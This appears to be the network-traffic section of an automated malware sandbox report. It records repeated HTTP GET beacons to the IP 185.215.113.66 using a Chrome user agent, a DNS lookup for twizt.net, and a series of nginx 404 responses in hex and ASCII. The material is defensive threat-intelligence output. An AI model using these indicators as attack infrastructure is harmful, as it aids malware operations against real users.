Source: global traffic	HTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 185.215.113.66
Source: global traffic	HTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 185.215.113.66
Source: global traffic	HTTP traffic detected: GET /4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 185.215.113.66
Source: global traffic	HTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 185.215.113.66
Source: global traffic	HTTP traffic detected: GET /6 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 185.215.113.66
Source: global traffic	HTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 185.215.113.66
Source: global traffic	HTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 185.215.113.66
Source: global traffic	HTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 185.215.113.66
Source: global traffic	HTTP traffic detected: GET /4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 185.215.113.66
Source: global traffic	HTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 185.215.113.66
Source: global traffic	HTTP traffic detected: GET /6 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 185.215.113.66

Source: unknown

DNS traffic detected: queries for: twizt.net

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 24 Apr 2024 08:07:19 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 24 Apr 2024 08:07:21 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 24 Apr 2024 08:07:23 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 24 Apr 2024 08:07:26 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 24 Apr 2024 08:07:28 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 24 Apr 2024 08:08:48 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 24 Apr 2024 08:08:51 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 24 Apr 2024 08:08:54 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
